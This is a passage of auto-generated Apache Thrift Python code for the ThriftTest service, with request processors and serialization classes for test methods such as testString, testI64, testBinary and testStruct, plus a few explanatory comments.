def process_testMulti(self, seqid, iprot, oprot):
args = testMulti_args()
args.read(iprot)
iprot.readMessageEnd()
result = testMulti_result()
try:
result.success = self._handler.testMulti(args.arg0, args.arg1, args.arg2, args.arg3, args.arg4, args.arg5)
msg_type = TMessageType.REPLY
except TTransport.TTransportException:
raise
except TApplicationException as ex:
logging.exception('TApplication exception in handler')
msg_type = TMessageType.EXCEPTION
result = ex
except Exception:
logging.exception('Unexpected exception in handler')
msg_type = TMessageType.EXCEPTION
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("testMulti", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_testException(self, seqid, iprot, oprot):
args = testException_args()
args.read(iprot)
iprot.readMessageEnd()
result = testException_result()
try:
self._handler.testException(args.arg)
msg_type = TMessageType.REPLY
except TTransport.TTransportException:
raise
except Xception as err1:
msg_type = TMessageType.REPLY
result.err1 = err1
except TApplicationException as ex:
logging.exception('TApplication exception in handler')
msg_type = TMessageType.EXCEPTION
result = ex
except Exception:
logging.exception('Unexpected exception in handler')
msg_type = TMessageType.EXCEPTION
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("testException", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_testMultiException(self, seqid, iprot, oprot):
args = testMultiException_args()
args.read(iprot)
iprot.readMessageEnd()
result = testMultiException_result()
try:
result.success = self._handler.testMultiException(args.arg0, args.arg1)
msg_type = TMessageType.REPLY
except TTransport.TTransportException:
raise
except Xception as err1:
msg_type = TMessageType.REPLY
result.err1 = err1
except Xception2 as err2:
msg_type = TMessageType.REPLY
result.err2 = err2
except TApplicationException as ex:
logging.exception('TApplication exception in handler')
msg_type = TMessageType.EXCEPTION
result = ex
except Exception:
logging.exception('Unexpected exception in handler')
msg_type = TMessageType.EXCEPTION
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("testMultiException", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_testOneway(self, seqid, iprot, oprot):
args = testOneway_args()
args.read(iprot)
iprot.readMessageEnd()
try:
self._handler.testOneway(args.secondsToSleep)
except TTransport.TTransportException:
raise
except Exception:
logging.exception('Exception in oneway handler')
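# A minimal serving sketch for the Processor above (assumptions: `Handler` is
# a user-written class implementing Iface; port 9090 and the default
# transport/protocol factories are illustrative choices):
#
#   from thrift.transport import TSocket, TTransport
#   from thrift.protocol import TBinaryProtocol
#   from thrift.server import TServer
#
#   server = TServer.TSimpleServer(
#       Processor(Handler()),
#       TSocket.TServerSocket(port=9090),
#       TTransport.TBufferedTransportFactory(),
#       TBinaryProtocol.TBinaryProtocolFactory())
#   server.serve()  # blocks, handling one connection at a time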
# HELPER FUNCTIONS AND STRUCTURES
class testVoid_args(object):
__slots__ = (
)
def read(self, iprot):
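# Fast path: delegate decoding to the C-accelerated extension
# (thrift.protocol.fastbinary) when it is loaded; otherwise fall through
# to the generic pure-Python field-skipping loop below.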
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
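# Mirror of the read() fast path: serialize via the C extension when
# present, else emit the struct field-by-field in pure Python.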
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('testVoid_args')
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, getattr(self, key))
for key in self.__slots__]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
if not isinstance(other, self.__class__):
return False
for attr in self.__slots__:
my_val = getattr(self, attr)
other_val = getattr(other, attr)
if my_val != other_val:
return False
return True
def __ne__(self, other):
return not (self == other)
all_structs.append(testVoid_args)
testVoid_args.thrift_spec = (
)
class testVoid_result(object):
__slots__ = (
)
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('testVoid_result')
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, getattr(self, key))
for key in self.__slots__]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
if not isinstance(other, self.__class__):
return False
for attr in self.__slots__:
my_val = getattr(self, attr)
other_val = getattr(other, attr)
if my_val != other_val:
return False
return True
def __ne__(self, other):
return not (self == other)
all_structs.append(testVoid_result)
testVoid_result.thrift_spec = (
)
class testString_args(object):
"""
Attributes:
- thing
"""
__slots__ = (
'thing',
)
def __init__(self, thing=None,):
self.thing = thing
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.thing = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('testString_args')
if self.thing is not None:
oprot.writeFieldBegin('thing', TType.STRING, 1)
oprot.writeString(self.thing.encode('utf-8') if sys.version_info[0] == 2 else self.thing)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, getattr(self, key))
for key in self.__slots__]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
if not isinstance(other, self.__class__):
return False
for attr in self.__slots__:
my_val = getattr(self, attr)
other_val = getattr(other, attr)
if my_val != other_val:
return False
return True
def __ne__(self, other):
return not (self == other)
all_structs.append(testString_args)
testString_args.thrift_spec = (
None, # 0
(1, TType.STRING, 'thing', 'UTF8', None, ), # 1
)
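# thrift_spec layout, one tuple per field id:
# (field id, TType, field name, type-specific extra -- e.g. 'UTF8' for
# strings or a nested container/struct spec -- default value). Index 0 is
# None because Thrift field ids start at 1.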
class testString_result(object):
"""
Attributes:
- success
"""
__slots__ = (
'success',
)
def __init__(self, success=None,):
self.success = success
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.STRING:
self.success = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('testString_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.STRING, 0)
oprot.writeString(self.success.encode('utf-8') if sys.version_info[0] == 2 else self.success)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, getattr(self, key))
for key in self.__slots__]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
if not isinstance(other, self.__class__):
return False
for attr in self.__slots__:
my_val = getattr(self, attr)
other_val = getattr(other, attr)
if my_val != other_val:
return False
return True
def __ne__(self, other):
return not (self == other)
all_structs.append(testString_result)
testString_result.thrift_spec = (
(0, TType.STRING, 'success', 'UTF8', None, ), # 0
)
class testBool_args(object):
"""
Attributes:
- thing
"""
__slots__ = (
'thing',
)
def __init__(self, thing=None,):
self.thing = thing
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.BOOL:
self.thing = iprot.readBool()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('testBool_args')
if self.thing is not None:
oprot.writeFieldBegin('thing', TType.BOOL, 1)
oprot.writeBool(self.thing)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, getattr(self, key))
for key in self.__slots__]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
if not isinstance(other, self.__class__):
return False
for attr in self.__slots__:
my_val = getattr(self, attr)
other_val = getattr(other, attr)
if my_val != other_val:
return False
return True
def __ne__(self, other):
return not (self == other)
all_structs.append(testBool_args)
testBool_args.thrift_spec = (
None, # 0
(1, TType.BOOL, 'thing', None, None, ), # 1
)
class testBool_result(object):
"""
Attributes:
- success
"""
__slots__ = (
'success',
)
def __init__(self, success=None,):
self.success = success
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.BOOL:
self.success = iprot.readBool()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('testBool_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.BOOL, 0)
oprot.writeBool(self.success)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, getattr(self, key))
for key in self.__slots__]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
if not isinstance(other, self.__class__):
return False
for attr in self.__slots__:
my_val = getattr(self, attr)
other_val = getattr(other, attr)
if my_val != other_val:
return False
return True
def __ne__(self, other):
return not (self == other)
all_structs.append(testBool_result)
testBool_result.thrift_spec = (
(0, TType.BOOL, 'success', None, None, ), # 0
)
class testByte_args(object):
"""
Attributes:
- thing
"""
__slots__ = (
'thing',
)
def __init__(self, thing=None,):
self.thing = thing
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.BYTE:
self.thing = iprot.readByte()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('testByte_args')
if self.thing is not None:
oprot.writeFieldBegin('thing', TType.BYTE, 1)
oprot.writeByte(self.thing)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, getattr(self, key))
for key in self.__slots__]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
if not isinstance(other, self.__class__):
return False
for attr in self.__slots__:
my_val = getattr(self, attr)
other_val = getattr(other, attr)
if my_val != other_val:
return False
return True
def __ne__(self, other):
return not (self == other)
all_structs.append(testByte_args)
testByte_args.thrift_spec = (
None, # 0
(1, TType.BYTE, 'thing', None, None, ), # 1
)
class testByte_result(object):
"""
Attributes:
- success
"""
__slots__ = (
'success',
)
def __init__(self, success=None,):
self.success = success
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.BYTE:
self.success = iprot.readByte()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('testByte_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.BYTE, 0)
oprot.writeByte(self.success)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, getattr(self, key))
for key in self.__slots__]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
if not isinstance(other, self.__class__):
return False
for attr in self.__slots__:
my_val = getattr(self, attr)
other_val = getattr(other, attr)
if my_val != other_val:
return False
return True
def __ne__(self, other):
return not (self == other)
all_structs.append(testByte_result)
testByte_result.thrift_spec = (
(0, TType.BYTE, 'success', None, None, ), # 0
)
class testI32_args(object):
"""
Attributes:
- thing
"""
__slots__ = (
'thing',
)
def __init__(self, thing=None,):
self.thing = thing
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I32:
self.thing = iprot.readI32()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('testI32_args')
if self.thing is not None:
oprot.writeFieldBegin('thing', TType.I32, 1)
oprot.writeI32(self.thing)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, getattr(self, key))
for key in self.__slots__]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
if not isinstance(other, self.__class__):
return False
for attr in self.__slots__:
my_val = getattr(self, attr)
other_val = getattr(other, attr)
if my_val != other_val:
return False
return True
def __ne__(self, other):
return not (self == other)
all_structs.append(testI32_args)
testI32_args.thrift_spec = (
None, # 0
(1, TType.I32, 'thing', None, None, ), # 1
)
class testI32_result(object):
"""
Attributes:
- success
"""
__slots__ = (
'success',
)
def __init__(self, success=None,):
self.success = success
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.I32:
self.success = iprot.readI32()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('testI32_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.I32, 0)
oprot.writeI32(self.success)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, getattr(self, key))
for key in self.__slots__]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
if not isinstance(other, self.__class__):
return False
for attr in self.__slots__:
my_val = getattr(self, attr)
other_val = getattr(other, attr)
if my_val != other_val:
return False
return True
def __ne__(self, other):
return not (self == other)
all_structs.append(testI32_result)
testI32_result.thrift_spec = (
(0, TType.I32, 'success', None, None, ), # 0
)
class testI64_args(object):
"""
Attributes:
- thing
"""
__slots__ = (
'thing',
)
def __init__(self, thing=None,):
self.thing = thing
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I64:
self.thing = iprot.readI64()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('testI64_args')
if self.thing is not None:
oprot.writeFieldBegin('thing', TType.I64, 1)
oprot.writeI64(self.thing)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, getattr(self, key))
for key in self.__slots__]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
if not isinstance(other, self.__class__):
return False
for attr in self.__slots__:
my_val = getattr(self, attr)
other_val = getattr(other, attr)
if my_val != other_val:
return False
return True
def __ne__(self, other):
return not (self == other)
all_structs.append(testI64_args)
testI64_args.thrift_spec = (
None, # 0
(1, TType.I64, 'thing', None, None, ), # 1
)
class testI64_result(object):
"""
Attributes:
- success
"""
__slots__ = (
'success',
)
def __init__(self, success=None,):
self.success = success
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.I64:
self.success = iprot.readI64()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('testI64_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.I64, 0)
oprot.writeI64(self.success)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, getattr(self, key))
for key in self.__slots__]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
if not isinstance(other, self.__class__):
return False
for attr in self.__slots__:
my_val = getattr(self, attr)
other_val = getattr(other, attr)
if my_val != other_val:
return False
return True
def __ne__(self, other):
return not (self == other)
all_structs.append(testI64_result)
testI64_result.thrift_spec = (
(0, TType.I64, 'success', None, None, ), # 0
)
class testDouble_args(object):
"""
Attributes:
- thing
"""
__slots__ = (
'thing',
)
def __init__(self, thing=None,):
self.thing = thing
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.DOUBLE:
self.thing = iprot.readDouble()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('testDouble_args')
if self.thing is not None:
oprot.writeFieldBegin('thing', TType.DOUBLE, 1)
oprot.writeDouble(self.thing)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, getattr(self, key))
for key in self.__slots__]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
if not isinstance(other, self.__class__):
return False
for attr in self.__slots__:
my_val = getattr(self, attr)
other_val = getattr(other, attr)
if my_val != other_val:
return False
return True
def __ne__(self, other):
return not (self == other)
all_structs.append(testDouble_args)
testDouble_args.thrift_spec = (
None, # 0
(1, TType.DOUBLE, 'thing', None, None, ), # 1
)
class testDouble_result(object):
"""
Attributes:
- success
"""
__slots__ = (
'success',
)
def __init__(self, success=None,):
self.success = success
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.DOUBLE:
self.success = iprot.readDouble()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('testDouble_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.DOUBLE, 0)
oprot.writeDouble(self.success)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, getattr(self, key))
for key in self.__slots__]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
if not isinstance(other, self.__class__):
return False
for attr in self.__slots__:
my_val = getattr(self, attr)
other_val = getattr(other, attr)
if my_val != other_val:
return False
return True
def __ne__(self, other):
return not (self == other)
all_structs.append(testDouble_result)
testDouble_result.thrift_spec = (
(0, TType.DOUBLE, 'success', None, None, ), # 0
)
class testBinary_args(object):
"""
Attributes:
- thing
"""
__slots__ = (
'thing',
)
def __init__(self, thing=None,):
self.thing = thing
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.thing = iprot.readBinary()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('testBinary_args')
if self.thing is not None:
oprot.writeFieldBegin('thing', TType.STRING, 1)
oprot.writeBinary(self.thing)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, getattr(self, key))
for key in self.__slots__]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
if not isinstance(other, self.__class__):
return False
for attr in self.__slots__:
my_val = getattr(self, attr)
other_val = getattr(other, attr)
if my_val != other_val:
return False
return True
def __ne__(self, other):
return not (self == other)
all_structs.append(testBinary_args)
testBinary_args.thrift_spec = (
None, # 0
(1, TType.STRING, 'thing', 'BINARY', None, ), # 1
)
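
# For TType.STRING fields the fourth spec element distinguishes text ('UTF8')
# from raw bytes ('BINARY'), so the accelerated codec knows whether to decode.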
class testBinary_result(object):
"""
Attributes:
- success
"""
__slots__ = (
'success',
)
def __init__(self, success=None,):
self.success = success
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.STRING:
self.success = iprot.readBinary()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('testBinary_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.STRING, 0)
oprot.writeBinary(self.success)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, getattr(self, key))
for key in self.__slots__]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
if not isinstance(other, self.__class__):
return False
for attr in self.__slots__:
my_val = getattr(self, attr)
other_val = getattr(other, attr)
if my_val != other_val:
return False
return True
def __ne__(self, other):
return not (self == other)
all_structs.append(testBinary_result)
testBinary_result.thrift_spec = (
(0, TType.STRING, 'success', 'BINARY', None, ), # 0
)
class testStruct_args(object):
"""
Attributes:
- thing
"""
__slots__ = (
'thing',
)
def __init__(self, thing=None,):
self.thing = thing
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.thing = Xtruct()
self.thing.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('testStruct_args')
if self.thing is not None:
oprot.writeFieldBegin('thing', TType.STRUCT, 1)
self.thing.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, getattr(self, key))
for key in self.__slots__]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
if not isinstance(other, self.__class__):
return False
for attr in self.__slots__:
my_val = getattr(self, attr)
other_val = getattr(other, attr)
if my_val != other_val:
return False
return True
def __ne__(self, other):
return not (self == other)
all_structs.append(testStruct_args)
testStruct_args.thrift_spec = (
None, # 0
(1, TType.STRUCT, 'thing', [Xtruct, None], None, ), # 1
)
class testStruct_result(object):
"""
Attributes:
- success
"""
__slots__ = (
'success',
)
def __init__(self, success=None,):
self.success = success
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.STRUCT:
self.success = Xtruct()
self.success.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('testStruct_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.STRUCT, 0)
self.success.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, getattr(self, key))
for key in self.__slots__]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
if not isinstance(other, self.__class__):
return False
for attr in self.__slots__:
my_val = getattr(self, attr)
other_val = getattr(other, attr)
if my_val != other_val:
return False
return True
def __ne__(self, other):
return not (self == other)
all_structs.append(testStruct_result)
testStruct_result.thrift_spec = (
(0, TType.STRUCT, 'success', [Xtruct, None], None, ), # 0
)
class testNest_args(object):
"""
Attributes:
- thing
"""
__slots__ = (
'thing',
)
def __init__(self, thing=None,):
self.thing = thing
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
